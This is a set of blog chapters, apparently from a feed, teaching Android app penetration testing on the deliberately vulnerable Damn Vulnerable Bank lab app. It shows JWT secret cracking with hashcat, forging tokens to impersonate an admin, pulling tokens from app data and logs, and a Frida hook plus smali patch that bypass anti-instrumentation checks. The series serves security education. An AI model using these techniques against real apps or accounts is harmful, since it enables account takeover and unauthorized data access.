{&quot;enc_data&quot;:&quot;Gk8SDggaEhJPWwFLDQgFCENAW15XTU8MHxodBgYIQ0BLPRICDgQJGkwaTU8FGx0PRVsWQxgIAgYPDgRYU19XUV1RVksPBAICFBQdMQkUAAMfG0xdWFpXQ1pWS0MYEh8bAAYMCENASxwUBg8EFA4HJwYAABMFQAQOAENWSwcUPgwFFwAARVsLABYaCxoc&quot;}

```
&lt;/details&gt;


```python
import base64

def decode_base64_and_xor(encoded_string):
    &quot;&quot;&quot;
    Decodes a Base64 encoded string and then applies an XOR operation with the string &quot;amazing&quot;.

    :param encoded_string: The Base64 encoded string.
    :return: The decoded string.
    &quot;&quot;&quot;
    # Decode the Base64 string
    decoded_bytes = base64.b64decode(encoded_string)
    decoded_string = decoded_bytes.decode(&apos;utf-8&apos;)

    # Apply the XOR operation with the string &quot;amazing&quot;
    key = &quot;amazing&quot;
    result = []
    for i in range(len(decoded_string)):
        xor_char = chr(ord(decoded_string[i]) ^ ord(key[i % len(key)]))
        result.append(xor_char)
    
    return &apos;&apos;.join(result)

# Example usage
if __name__ == &quot;__main__&quot;:
    encoded_string = &quot;your_encoded_string_here&quot;  # Replace this with your encoded string
    
    decoded_string = decode_base64_and_xor(encoded_string)
    print(&quot;Decoded string:&quot;, decoded_string)


```

As you can see in the following image, in this case, we have successfully decoded the data and discovered the profile information of another user, which in this case is `beru`.

![](/content/images/2024/06/image-5.png)

Data of the user&apos;s beru profile

This application has a default admin user, so we can also try to find out their data. By changing the JWT username from `&quot;rsgbengi@gmail.com&quot;` to `&quot;admin&quot;` and setting `&quot;is_admin&quot;` to `&quot;true&quot;`, we can impersonate the admin user.

![](/content/images/2024/06/image-13.png)

Impersonating the admin user

![](/content/images/2024/06/image-14.png)

Data of the admin user

# **Understanding MobSF: A Powerful Mobile Security Framework**

Moving on from the previous section where we discussed reverse engineering, let&apos;s now dive into what MobSF is and why it’s an essential tool for mobile security.

## **What is MobSF?**

MobSF (Mobile Security Framework) is an open-source security framework designed to perform automated security analysis of mobile applications. It supports both Android and iOS platforms, making it a versatile tool for mobile app developers and security analysts alike. Whether you have an APK (Android Package) or an IPA (iOS App Store Package), MobSF can dissect it and provide detailed insights into its security posture.

**Key Features of MobSF:**

1.  **Static Analysis:** MobSF performs static analysis by decompiling the application code and inspecting it for vulnerabilities. This includes identifying insecure coding practices, potential data leaks, and other security flaws without executing the app.
2.  **Dynamic Analysis:** For a more in-depth assessment, MobSF can also run the app in a controlled environment to observe its behavior in real-time. This dynamic analysis helps in identifying runtime issues, such as network security concerns and improper use of APIs.
3.  **API Analysis:** MobSF examines the APIs used by the application to detect any insecure or outdated APIs that might expose the app to security risks.
4.  **Malware Analysis:** The framework includes malware analysis capabilities, allowing it to detect malicious code that could compromise the device or the data it handles.
5.  **User-Friendly Reports:** After completing its analysis, MobSF generates comprehensive and user-friendly reports. These reports highlight the identified vulnerabilities and provide recommendations for remediation, making it easier for developers to enhance the security of their applications.

### Installing MobSF with Docker

The process of installing MobSF (Mobile Security Framework) is quite easy, thanks to Docker. You only need to execute the following code:

```bash
# Pulling the image
docker pull opensecurity/mobile-security-framework-mobsf:latest
# Running the docker container
docker run -it --name mobsf -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
```

### Steps to Install MobSF

1.  **Pull the MobSF Docker Image:** The first step is to pull the latest MobSF Docker image from the Docker repository. This can be done using the `docker pull` command:

```bash
docker pull opensecurity/mobile-security-framework-mobsf

```

2.  **Run the Docker Container:** Once the image is downloaded, you can run the MobSF Docker container. The `-it` flag runs the container in interactive mode, and the `-p 8000:8000` flag maps port 8000 on your local machine to port 8000 on the Docker container, making the MobSF web interface accessible via `http://localhost:8000`:

```bash
docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest

```

## Starting Your First Scan

Once MobSF is installed and running, initiating your first scan is quite simple. Follow these steps:

1.  **Access the MobSF Web Interface:** Open your web browser and go to `http://localhost:8000`. Log in with the credentials:

```bash
Username: mobsf
Password: mobsf

```

![](/content/images/2024/06/image-15.png)

Log in into MobSF

2.  **Select &quot;Static Analyzer&quot;:** From the MobSF dashboard, navigate to the &quot;Static Analyzer&quot; option. This tool allows you to perform a comprehensive analysis of your APK.

![](/content/images/2024/06/image-21.png)

Static Analyzer of MobSF

3.  **Upload Your APK:** Click on the upload button and select the APK file you want to analyze. MobSF will start the static analysis automatically once the APK is uploaded.

![](/content/images/2024/06/image-17.png)

Uploading the apk

## Analyzing Your First Scan

  
The Static Analyzer will dissect the APK, examining various components such as permissions, code structure, and security configurations. After the analysis is complete, MobSF will provide a detailed report highlighting potential vulnerabilities and security issues.

When the analyzer finishes, you will see a comprehensive report generated by MobSF. It is highly recommended to thoroughly review all sections of the report, as they contain valuable insights into the application&apos;s security posture.

![](/content/images/2024/06/image-18.png)

Report of MobSF

### Key Sections of the Report

**Security Analysis:** The Security Analysis section is particularly crucial as it encompasses a wide range of information focused on both the configuration and code of the application. Some of the most useful tabs within this section include:

-   **Network Configuration Analysis:** This tab reviews the security of the application&apos;s network communications. Similar to tools like Testssl for web applications, it assesses HTTPS implementation and other network security practices. Here, you can identify issues such as weak SSL/TLS configurations, insecure transmission of data, and other network-related vulnerabilities.

![](/content/images/2024/06/image-22.png)

Network Configuration Review

-   **Manifest Configuration Analysis:** The manifest file is essential for setting up the application&apos;s permissions and components. This tab analyzes the manifest for potential misconfigurations and over-permissive settings that could lead to security risks. You can download the manifest directly from MobSF for a detailed inspection.

![](/content/images/2024/06/image-19.png)

Manifest configuration review

-   **Code Analysis:** This tab delves into the source code, identifying insecure coding practices and potential vulnerabilities such as hardcoded credentials, insecure data handling, and possible SQL injection points. Code analysis often uncovers subtle issues that might not be apparent in other sections.

![](/content/images/2024/06/image-23.png)

Code review

**Reconnaissance:** The Reconnaissance section is invaluable for identifying exposed sensitive information. Key areas to examine include:

-   **Hardcoded Secrets:** This part of the report identifies any hardcoded secrets within the application, such as API keys, passwords, and tokens. These can be critical security issues as they might provide attackers with direct access to backend systems or services.
-   **Email Addresses:** The report also highlights any email addresses found within the APK. These can sometimes be used for phishing attacks or to gather more information about the application&apos;s developers and stakeholders.

![](/content/images/2024/06/image-20.png)

Possible harcoded credentials

**Additional Insights:** MobSF provides a plethora of other details that can help enhance your application&apos;s security. This includes:

-   **File Analysis:** Inspect all files within the APK package for malicious content, unauthorized modifications, and security risks. Configuration files, assets, and embedded libraries are all analyzed to ensure they do not introduce vulnerabilities.
-   **Binary Analysis:** The compiled binary is scrutinized to uncover any hidden malicious code or unintended functionality. This involves reverse engineering and examining the binary for signs of tampering or embedded malware.

# Conclusion

In this chapter, we tackled the challenge of decoding server responses and understanding the application&apos;s behavior through reverse engineering. By extracting and analyzing the Java code from the APK, we uncovered how the application encodes and decodes data, providing valuable insights into its inner workings. This process highlighted the importance of reverse engineering in identifying and addressing potential security issues.

Moving forward, we introduced MobSF (Mobile Security Framework) as a powerful tool for performing automated security analysis of mobile applications. MobSF&apos;s capabilities in both static and dynamic analysis allowed us to gain a comprehensive understanding of the application&apos;s security posture. By utilizing MobSF, we were able to identify vulnerabilities, examine network configurations, and analyze code for insecure practices.

# References

1.  **Muellerberndt, B.** &quot;APKX: One-Step APK Decompilation With Multiple Backends.&quot; GitHub Repository. Available at: [https://github.com/muellerberndt/apkx](https://github.com/muellerberndt/apkx)
2.  **Frida: A world-class dynamic instrumentation toolkit.** &quot;Frida Documentation.&quot; Available at: [https://frida.re](https://frida.re/)
3.  **Base64 Encoding and Decoding.** &quot;RFC 4648 - The Base16, Base32, and Base64 Data Encodings.&quot; Available at: https://tools.ietf.org/html/rfc4648
4.  **XOR Obfuscation.** &quot;XOR Cipher - Wikipedia.&quot; Available at: [https://en.wikipedia.org/wiki/XOR\_cipher](https://en.wikipedia.org/wiki/XOR_cipher)
5.  **MobSF (Mobile Security Framework).** &quot;MobSF Documentation.&quot; Available at: https://mobsf.github.io/docs/
6.  **Docker Documentation.** &quot;Get Started with Docker.&quot; Available at: https://docs.docker.com/get-started/
7.  **JSON Web Tokens.** &quot;JWT.io - Introduction to JSON Web Tokens.&quot; Available at: https://jwt.io/introduction/
8.  **TestSSL.sh.** &quot;TestSSL.sh Documentation.&quot; Available at: [https://testssl.sh/](https://testssl.sh/)</content:encoded><author>Ruben Santos</author></item><item><title>Exploring Android File System and Log Vulnerabilities</title><link>https://www.kayssel.com/post/android-3</link><guid isPermaLink="true">https://www.kayssel.com/post/android-3</guid><description>In this chapter, we explored Android file system security using the com.app.damnvulnerablebank app. We identified JWT vulnerabilities and analyzed key directories. Next, we&apos;ll examine the app&apos;s encryption algorithm to see if we can access other users&apos; data using JWTs.</description><pubDate>Sat, 08 Jun 2024 09:00:33 GMT</pubDate><content:encoded># Introduction

Continuing from the previous chapter of this series, we delve deeper into the critical aspects of the file system within Android applications, focusing on security vulnerabilities and best practices. Using the Objection tool, a powerful asset for mobile security assessments, we will analyze the directories used by the com.app.damnvulnerablebank application.

Key points covered in this article include:

1.  **File System Overview**: We start by understanding the key directories in an Android application, such as cache, code cache, external cache, files, and OBB directories. We discuss their roles and the potential security implications associated with each.
2.  **Analyzing Application Directories with Objection**: By using the `env` command in Objection, we gather valuable information about the application&apos;s directories.
3.  **Significance of the /data Directory**: We delve into the /data directory, which is crucial for storing app-specific data. This section explains the subdirectories within /data, their purposes, and the security measures that protect sensitive information from unauthorized access.
4.  **Understanding the /storage Directory**: This section explains the structure of the /storage directory, which is used for external storage and accessible by users and other apps with appropriate permissions. We discuss how data in this directory can be more exposed to potential security risks.
5.  **Inspecting the Data Directory**: We demonstrate how to compress and analyze the data directory of the application using the `tar` command. This allows us to inspect the contents and identify potential security vulnerabilities.
6.  **Security Implications of JWT in Logs**: Finally, we address a common security vulnerability: the exposure of sensitive information, such as JWT tokens, in application logs. We explain how to detect these tokens in logs and discuss the risks associated with this practice.

By the end of this article, you will have a comprehensive understanding of the file system structure in Android applications, the security risks involved, and practical steps to mitigate these vulnerabilities. Let&apos;s dive in and explore how to safeguard sensitive information in mobile apps.

# File system

![](/content/images/2024/05/image-31.png)

Use of objection to analyze file system

As we explored in the previous chapter, the Objection tool is a powerful asset for assessing the security of mobile applications. Running the `env` command in Objection provides valuable information about various directories used by the application under analysis. Here, we break down the output obtained for the `com.app.damnvulnerablebank` application on an Android device:

1.  **cacheDirectory**: This directory (`/data/user/0/com.app.damnvulnerablebank/cache`) is where the app stores temporary data and cache files. The system can remove these files to free up space when necessary.
2.  **codeCacheDirectory**: Located at `/data/user/0/com.app.damnvulnerablebank/code_cache`, this directory stores data that helps speed up code execution, such as runtime compilations.
3.  **externalCacheDirectory**: This directory (`/storage/emulated/0/Android/data/com.app.damnvulnerablebank/cache`) functions similarly to `cacheDirectory`, but it is on external storage. It is accessible by the user and other apps with appropriate permissions.
4.  **filesDirectory**: The files directory (`/data/user/0/com.app.damnvulnerablebank/files`) is used for storing persistent data that should survive through the app&apos;s lifecycle. Unlike the cache, data here is not automatically removed by the system.
5.  **obbDir**: The OBB directory (`/storage/emulated/0/Android/obb/com.app.damnvulnerablebank`) stores Opaque Binary Blob (OBB) files, which typically contain large supplementary data for the APK, like additional graphics or media.
6.  **packageCodePath**: This path (`/data/app/com.app.damnvulnerablebank-210K03gT5qN-QA-_MgWCHA==/base.apk`) indicates where the installed application&apos;s APK file is located. It contains the app&apos;s code and resources.

To fully understand the significance of these directories, it&apos;s essential to look at the broader context of the `/data` and `/storage` directories in Android.

## The /data Directory in Android

In Android, the `/data` directory is a crucial part of the system&apos;s storage architecture. It is primarily used for storing app-specific data and is divided into several subdirectories:

-   **/data/app**: This subdirectory stores the installed APK files of apps.
-   **/data/data**: Here is where app-specific data is kept, including configurations, databases, shared preferences, and files.
-   **/data/user/0**: A symbolic link to `/data/data`, representing the primary user&apos;s data directory in a multi-user environment.

The `/data` directory is only accessible by the system and the respective app, ensuring that sensitive data is protected from unauthorized access.

![](/content/images/2024/05/image-32.png)

Data directory

## The /storage Directory in Android

The `/storage` directory is used for external storage, which can be accessed by the user and other apps with the appropriate permissions. It is divided into several parts:

-   **/storage/emulated/0**: This is the primary shared storage location, often referred to as &quot;Internal Storage&quot; by users. It is where the app&apos;s external cache, files, and OBB data are stored. For example:
    -   **/storage/emulated/0/Android/data/\[app\_package\_name\]/cache**: Stores the app&apos;s external cache files.
    -   **/storage/emulated/0/Android/data/\[app\_package\_name\]/files**: Stores the app&apos;s external files.
    -   **/storage/emulated/0/Android/obb/\[app\_package\_name\]**: Stores OBB files for the app.
-   **/storage/sdcard1** (or similar): Represents the external SD card if available.

The `/storage` directory is more accessible compared to the `/data` directory and is used for data that can be shared between apps and with the user, such as media files, downloads, and documents.

![](/content/images/2024/05/image-34.png)

Empty storage directory

# Inspecting the data directory

Comparison of the two directories reveals that the storage directory is empty, whereas the data directory contains various directories that may contain valuable information. Therefore, our plan is to compress all the data using tar and analyze it on our machine.

```bash
tar -zcf /sdcard/Download/data.tar.gz /data/user/0/com.app.damnvulnerablebak

```

![](/content/images/2024/05/image-33.png)

Data directory compressed

After creating the compressed file containing all the data, we can download it using adb and the pull command. Subsequently, we can extract the contents using tools such as atool or tar.

![](/content/images/2024/05/image-35.png)

Decompressed data directory

To get a high-level view of all the files inside the data directory, we can use the `tree` command. One of the files that appears to be the most interesting is jwt.xml.

![](/content/images/2024/05/image-36.png)

jwt.xml

Upon examining the file&apos;s contents, we immediately notice the presence of the application&apos;s authorization token (JWT). This poses a significant security risk, as sensitive information of this nature should be securely stored to prevent unauthorized access by malicious individuals. In a real-world scenario, such as with a banking application, unauthorized access to a JWT could potentially lead to the exposure of sensitive user data.

![](/content/images/2024/05/image-37.png)

JWT inside jwt.xml

One of the recommended tools for analyzing JWT tokens is jwt.io. If you are unfamiliar with JWT tokens, [I have a chapter in my series on hacking APIs that delves into them in depth.](https://www.kayssel.com/post/api-hacking-3/)

![](/content/images/2024/05/image-38.png)

Information inside the JWT payload

As shown in the image above, jwt.io allows us to clearly view all the data contained in the JWT, including the username and admin status of the user.

One of the initial steps we can take, especially if we know the JWT is signed with HS256, is to attempt to crack it using tools like hashcat. If successful, we could potentially modify the JWT and forge tokens for any user. To attempt cracking the JWT, the following command can be used:

```bash
hashcat -a 0 -m 16500 jwt.txt /usr/share/wordlists/rockyou.txt

```

![](/content/images/2024/05/image-41.png)

In this scenario, the JWT was successfully cracked, revealing that the secret used to sign the JWT is &quot;secret.&quot; With this knowledge, the authorization system of the application has been compromised.

# Abusing the JWT

For example, if we intercept traffic using BurpSuite when accessing the user profile, we can observe how the JWT is used to authorize the user and retrieve their corresponding data, such as username and account number. This is visible thanks to the interface, but the response of the request only shows data that appears to be encrypted. Therefore, we rely on the user interface to view the data sent and received for the user.

![](/content/images/2024/05/image-39.png)

Profile&apos;s information with a valid JWT

![](/content/images/2024/05/image-40.png)

Encrypted response

By modifying the JWT using BurpSuite plugins like [JSON Web Tokens](https://portswigger.net/bappstore/f923cbf91698420890354c1d8958fee6), we can attempt to change the username and re-sign the token with the correct password. This allows us to potentially impersonate another user (in this we will try to impersonate the user rsgbengi).

![](/content/images/2024/05/image-44.png)

Trying to impersonate rsgbengi

After doing this, I notice that the information of the profile of the user impersonated is not shown my the interface of the application.

![](/content/images/2024/05/image-43.png)

User interface without information

This means that we depend on the encrypted response data to understand what is happening. In future chapters of this series, we will learn how to decode this encrypted data.

# Sensitive information in logs

Sensitive information exposure in logs refers to the practice of recording sensitive data, such as authorization tokens or user credentials, in application logs. In Android applications, this is particularly risky because logs can be accessed by other apps or malicious actors, leading to potential security breaches.

A common practice when identifying that an application uses a JWT is to search for it in the logs. Developers often save the value of JWTs in the logs, but this is considered a vulnerability because it exposes sensitive information that could be exploited by malicious actors.

To analyze all the logs generated by the application, we can use the following command:

```bash
adb logcat | tee logs.txt

```

This command will create a file with all the logs generated by the Android device. We can then analyze this file to detect sensitive information, such as the JWT. Additionally, if we know that the application uses card numbers or similar sensitive data, we can look for this type of information in the logs as well.

In this case, as you can see in the following image, if we search for &quot;token&quot; after a successful login, we can find the JWT in the logs, demonstrating that the vulnerability is present in the application.

```bash
cat logs.txt | grep -i &quot;token&quot;

```

![](/content/images/2024/06/image.png)

# Conclusions

In this chapter, we explored the security vulnerabilities within the Android file system, focusing on the com.app.damnvulnerablebank application. Using the Objection tool, we gathered detailed information about various directories and highlighted the importance of understanding their roles. We demonstrated how to inspect and analyze these directories to uncover sensitive information, such as JWT tokens, that may be improperly stored in logs. By identifying these vulnerabilities, we underscored the need for secure data handling practices to protect against unauthorized access and potential security breaches.

In the next chapter, we will delve into the encryption algorithm used by the application. This will help us determine if we can exploit the JWTs to access data from other users, further assessing the security measures of the application.

# References

1.  **OWASP Mobile Security Testing Guide**: An essential resource for understanding the various aspects of mobile security testing. OWASP MSTG
2.  **JWT.io**: A tool for decoding, verifying, and generating JSON Web Tokens. It also provides comprehensive documentation on JWTs. [JWT.io](https://jwt.io/)
3.  **Objection - Runtime Mobile Exploration**: A powerful tool used for assessing mobile application security. Detailed documentation and usage guides can be found on their official site. [Objection Tool](https://github.com/sensepost/objection)
4.  **Android Developer Documentation**: Official documentation from Google on Android&apos;s file system and security practices. [Android Developers](https://developer.android.com/docs)
5.  **Hashcat - Advanced Password Recovery**: A popular tool for cracking passwords, including JWTs. Hashcat
6.  **ADB (Android Debug Bridge) Documentation**: Essential for understanding how to interact with Android devices via command line. [ADB Documentation](https://developer.android.com/studio/command-line/adb)
7.  **Burp Suite Documentation**: Comprehensive guide on using Burp Suite for web application security testing, including JWT manipulation. Burp Suite
8.  **NIST Guidelines on Secure Password Storage**: Best practices for storing and managing passwords securely. [NIST Guidelines](https://pages.nist.gov/800-63-3/sp800-63b.html)
9.  **RockYou Wordlist**: A commonly used wordlist for password cracking and security testing. [RockYou Wordlist](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou.txt.tar.gz)
10.  **Cybersecurity Blog on Mobile App Penetration Testing**: A detailed blog that covers various aspects of mobile app security testing. Cybersecurity Blog</content:encoded><author>Ruben Santos</author></item><item><title>Comprehensive Android Security Testing: Patching, Objection, and API Backend</title><link>https://www.kayssel.com/post/android-2</link><guid isPermaLink="true">https://www.kayssel.com/post/android-2</guid><description>This article explores advanced Android pentesting: patching apps to bypass security, using Objection for real-time inspection, and configuring backends with Docker Compose. These techniques enable deeper analysis and better vulnerability detection.</description><pubDate>Mon, 27 May 2024 08:48:30 GMT</pubDate><content:encoded># Introduction

In this second chapter, we will delve into advanced techniques and tools used in the penetration testing of Android applications. This chapter will focus on three key points:

-   **Patching an Application**: Learn how to modify an application&apos;s code to bypass security mechanisms, enabling deeper analysis and vulnerability detection.
-   **Using Objection**: Get introduced to Objection, a powerful runtime mobile exploration tool that leverages Frida&apos;s capabilities for real-time application inspection and modification. We&apos;ll cover how to install and use Objection for various security analysis tasks.
-   **Configuring the Application Backend**: Understand how to set up and configure the application&apos;s backend using Docker Compose to facilitate interaction with the API, ensuring a complete environment for security testing.

By the end of this chapter, you&apos;ll have a comprehensive understanding of these essential tools and methods, enhancing your ability to conduct thorough and effective security assessments of Android applications.

# Patching an application

Patching in pentesting refers to modifying the application&apos;s code to circumvent security measures that prevent in-depth analysis. This can involve disabling root detection, SSL pinning, or anti-debugging mechanisms. The goal is to allow the penetration tester to fully analyze the app&apos;s behavior and identify vulnerabilities without being hindered by these protections.

To patch an application, we first need to follow the process outlined in the [previous chapter](https://www.kayssel.com/post/android-1/) to decompile the application and study the code.

![](/content/images/2024/05/image-6.png)

App Decompilation

The key difference now is that instead of decompiling to Java, we will use Smali, as it allows for easier recompilation of the application with the necessary changes. With the information we already have, we can locate the code that stops the execution of the program, in this case related to Frida detection.

![](/content/images/2024/05/image-7.png)

Detection of protection measures

As shown in the image above, the changes need to be made in the `MainActivity.smali` file, where the detection occurs. By examining the code, we find the `finish` function, which is responsible for closing the app when certain conditions are met. To solve the problem and prevent the program from breaking after detecting Frida/emulation, we simply need to comment out or eliminate these parts of the code.

![](/content/images/2024/05/image-8.png)

Comment code that terminates the application

![](/content/images/2024/05/image-23.png)

Correspondence with the code in Java

Once the changes have been made, we simply recompile the application and sign it as we did in the previous chapter.

![](/content/images/2024/05/image-9.png)

Compilation of the application

![](/content/images/2024/05/image-10.png)

Application signature process

After this, we only need to install the patched application. Thanks to the patching, we will not need to launch it with Frida every time to interact with it.

![](/content/images/2024/05/image-12.png)

Application Installation

![](/content/images/2024/05/image-11.png)

Access to the application

# Objection

Objection is described as a &quot;runtime mobile exploration&quot; tool. Simply put, this means it allows users to interact with and modify applications while they are running. Leveraging the capabilities of Frida, Objection enables real-time inspection and modification of application behavior. It is often used instead of plain Frida because it provides a higher-level, user-friendly interface and pre-built functionalities that simplify common tasks, making it more accessible for security professionals who may not be as familiar with scripting or programming.

Objection offers a variety of functionalities crucial for mobile application security analysis:

-   **Object and Method Manipulation**: Allows modification of objects and methods within the application, facilitating the detection of vulnerabilities and undesired behaviors. Today, we will focus on this functionality, but in the future, we will also use it for points 2 and 3.
-   **Application Structure Exploration**: Provides tools to navigate and examine the internal structure of the application, including views, activities, and services.
-   **Security Bypass**: Helps bypass security measures such as root detection, certificate pinning, and other protections that might hinder deeper analysis. We will cover this functionality in upcoming chapters.

## Installation Process and Usage

To install the tool, using pip alone will suffice:

```bash
pip install objection

```

Additionally, we need to initialize the Frida server on the Android device and specify port “27042”; otherwise, the tool will not work:

```bash
data/local/tmp/frida-server-16.2.1-android-x86_64 -l 0.0.0.0:27042

```

Once this is done, we will need to locate the name of the application to launch it. This can be done using the following command:

```bash
frida-ps -U

```

![](/content/images/2024/05/image-25.png)

Process Dump

After identifying the application, we can launch Objection, and the application will also be launched on the device:

```bash
objection -N -h 192.168.20.143 --gadget &quot;DamnVulnerableBank&quot; explore

```

![](/content/images/2024/05/image-13.png)

Objection startup

To detect protection measures, Objection allows you to display the different classes of the application. In this case, as shown in the following image, there are not many classes, making it easy to identify potential issues. However, in real-world scenarios, there may be many more classes, making it more challenging to find what you are looking for:

```bash
android hooking search classes com.app.damnvulnerablebank

```

![](/content/images/2024/05/image-14.png)

Detection of the FridaCheckIn class

Once we have identified an interesting class, we can filter by its methods:

```bash
 android hooking list class_methods com.app.damnvulnerablebank.FridaCheckJNI

```

![](/content/images/2024/05/image-24.png)

Search class methods

After identifying the class, we can use an agent to monitor the method and display its return value when it fails:

```bash
android hooking watch class_method com.app.damnvulnerablebank.FridaCheckJNI.fridaCheck --dump-return

```

![](/content/images/2024/05/image-15.png)

Monotoring to see what is returned by the method

Objection also allows us to load scripts from Frida and use them as needed. In the following image, you can see how I have loaded the script developed in the previous chapter to evade Frida detection:

```javascript
Java.perform(function () {
    console.log(&quot;looking for FridaCheckJNI.fridaCheck()&quot;);

    try {
        const FridaCheckJNI = Java.use(&apos;com.app.damnvulnerablebank.FridaCheckJNI&apos;);

        FridaCheckJNI.fridaCheck.implementation = function() {
            console.log(&quot;hooking fridaCheck().&quot;);
            var value = this.fridaCheck.call(this);
            console.log(&quot;fridaCheck() returned &quot; + value);
            console.log(&quot;switching fridaCheck() to 0&quot;);
            return 0;  // Always return 0 to bypass checks
        };
    } catch (e) {
        console.log(&quot;Failed to hook fridaCheck: &quot; + e.message);
    }
});

```

![](/content/images/2024/05/image-17.png)

Script import

# Application backend

The last part I wanted to discuss in this chapter is the configuration of the backend of the application to interact with the API. This is straightforward since you can build everything directly with Docker Compose. The only detail to keep in mind is the port configuration, to ensure it is not already in use (I had it occupied by Juice Shop).

![](/content/images/2024/05/image-19.png)

Docker compose file

Once you have verified and possibly adjusted the port configuration, you can deploy everything using the following command:

```bash
docker-compose up --build

```

![](/content/images/2024/05/image-18.png)

Docker build process

After setting up the application, navigate to the front-end and enter the API URL to check if everything is working correctly.

![](/content/images/2024/05/image-20.png)

Confirmation that the API is working

Finally, create a user and try to log in to access all the functionalities of the application.

![](/content/images/2024/05/image-21.png)

User registration

![](/content/images/2024/05/image-22.png)

Application Portal

# Conclusions

In this chapter, we have explored crucial techniques and tools for enhancing the penetration testing of Android applications. Here are the key takeaways:

-   **Patching an Application**: We used patching to prevent the application from stopping when Frida is detected or when the device is used in an emulated environment, allowing for more in-depth analysis and vulnerability detection.
-   **Leveraging Objection**: We introduced Objection as a user-friendly tool that simplifies the process of runtime application exploration and manipulation. Through practical examples, we learned how to manipulate objects and investigate methods within the application.
-   **Backend Configuration with Docker Compose**: We covered the setup and configuration of the application&apos;s backend using Docker Compose, enabling seamless interaction with the API. This ensures a complete and functional environment for conducting security assessments.

By mastering these techniques and tools, you are now better equipped to perform comprehensive and effective security testing on Android applications. These skills will enable you to uncover vulnerabilities, understand application behavior, and enhance overall security measures.

# References

-   Frida. Retrieved from [https://frida.re](https://frida.re/)
-   Objection. Retrieved from [https://github.com/sensepost/objection](https://github.com/sensepost/objection)
-   Android Security Testing. Retrieved from https://owasp.org/www-project-mobile-security-testing-guide/latest/Android\_Testing\_Guide
-   Docker Compose Documentation. Retrieved from https://docs.docker.com/compose/
-   Smali/Baksmali. Retrieved from [https://github.com/JesusFreke/smali](https://github.com/JesusFreke/smali)
-   OWASP Mobile Security Project. Retrieved from https://owasp.org/www-project-mobile-security/
-   Pentesting Android Apps with Frida. Retrieved from https://www.hackingarticles.in/pentesting-android-apps-using-frida/
-   Juiceshop. Retrieved from https://owasp.org/www-project-juice-shop/
-   Android Developers Documentation. Retrieved from [https://developer.android.com/docs](https://developer.android.com/docs)
-   Practical Mobile Forensics. (2016). Authors: Heather Mahalik, Rohit Tamma, and Satish Bommisetty. Packt Publishing.
-   TrustedSec. Android Hacking for Beginners. Retrieved from [https://trustedsec.com/blog/android-hacking-for-beginners](https://trustedsec.com/blog/android-hacking-for-beginners)</content:encoded><author>Ruben Santos</author></item><item><title>Mastering Mobile Security: A Guide with Damn Vulnerable Bank</title><link>https://www.kayssel.com/post/android-1</link><guid isPermaLink="true">https://www.kayssel.com/post/android-1</guid><description>The article discusses using &quot;Damn Vulnerable Bank&quot; to teach mobile app security, focusing on setup, OWASP guidelines, and tools like APKTool and Frida for practical insights.</description><pubDate>Wed, 08 May 2024 14:45:08 GMT</pubDate><content:encoded># Introduction to Mobile Application Security Auditing: Embracing the Challenge with &quot;Damn Vulnerable Bank&quot;

Welcome to the first chapter of my series on Android security concepts, featuring a detailed exploration of mobile application security through &quot;Damn Vulnerable Bank&quot; (DVB), a deliberately insecure Android application. This chapter lays the groundwork for understanding and testing mobile security, offering a structured learning path that follows the OWASP Mobile Application Security Testing Guide (MASTG). As I guide you through various methodologies, tools, and practical challenges, this series will equip you with the expertise needed to audit mobile applications effectively.

**Key Takeaways of this chapter:**

-   **Methodology Grounded in OWASP MASTG:** My approach closely follows the comprehensive and accessible guidelines provided by OWASP MASTG, ensuring a robust framework for auditing Android applications. This guide not only teaches the &apos;how&apos; but also explains the &apos;why&apos; behind each testing technique, serving as a foundation for the upcoming chapters.
-   **Practical Lab Setup:** Whether you&apos;re using a physical rooted device or a virtual machine, setting up your lab is the first critical step. Tools like Android-x86 on platforms like Proxmox or VMware, combined with network proxying through BurpSuite, provide a controlled and insightful testing environment that we will build upon in subsequent chapters.
-   **In-Depth Application Analysis with &quot;Damn Vulnerable Bank&quot;:** DVB is not just an app; it&apos;s an educational tool designed to simulate a real-world banking environment filled with intentional vulnerabilities. By engaging with DVB, learners can safely explore and exploit these weaknesses to gain a deep understanding of common security flaws—a theme that will be expanded in later sections.
-   **Technological Insights:** DVB is built on common technologies such as Java, Kotlin, SQLite, and the Android SDK, intertwined with a REST API. These technologies, prevalent in many real-world applications, make DVB an excellent model for learning about potential misconfigurations and vulnerabilities, insights that we will apply and explore further in our series.
-   **Hands-On Security Testing:** From user authentication and account management to transaction security and administrative functions, DVB offers a comprehensive feature set for practical security testing. Each feature not only provides utility but also serves as a potential point of vulnerability, offering myriad opportunities for security analysis which we will continue to uncover.
-   **Advanced Techniques in Decompiling and Reverse Engineering:** Tools like APKTool and ApkX are instrumental in decompiling APK files to their foundational code, allowing for detailed analysis and modification of the app&apos;s behavior. This process is crucial for understanding and mitigating the application’s built-in defense mechanisms, a skill that will be crucial as we delve deeper into specific vulnerabilities and defense strategies.
-   **Dynamic Analysis with Frida:** Learn to use Frida, a dynamic instrumentation toolkit, to modify application behavior in real-time. This powerful tool facilitates the injection of custom scripts to probe and alter app functionalities, providing a hands-on experience in dynamic application security testing—a technique that will be pivotal in our ongoing exploration of Android security.

By the chapter&apos;s conclusion, you’ll not only know how to set up and break down an application but also how to recompile and sign an APK, ensuring it meets security standards before redistribution. Through the structured exploration of &quot;Damn Vulnerable Bank,&quot; this chapter aims to instill a profound understanding of mobile application security challenges and how to tackle them effectively. Whether you are a novice eager to dive into the world of app security or an experienced auditor refining your skills, this guide provides the knowledge and tools necessary to navigate the complex landscape of mobile vulnerabilities, setting the stage for more advanced topics in our series.

# Methodology

In my previous series, I&apos;ve dedicated specific articles to methodology. For auditing Android applications, however, I recommend following the OWASP guide—it&apos;s comprehensive and straightforward. I typically explore the &quot;techniques&quot; section, applying each test to see how the application reacts. If you&apos;re new to Android auditing, this guide will provide essential context and introduce you to the tools most frequently used in the field.

[OWASP MASTG - OWASP Mobile Application Security](https://mas.owasp.org/MASTG/)

![](/content/images/2024/04/image-48.png)

Android hacking techniques

# Lab Setup

First up, we&apos;ll set up our lab for testing. You have two main options: using a physical rooted mobile phone or a virtual machine. For simplicity, I&apos;ll use a virtual machine in this guide. If you&apos;re looking to set it up with Proxmox, I highly recommend following the detailed guidelines provided in the linked article below. This article not only explains how to install everything using Proxmox but also covers essential setups for BurpSuite and getting started with ADB. It&apos;s crucial to familiarize yourself with these tools and configurations before continuing with the rest of the series.

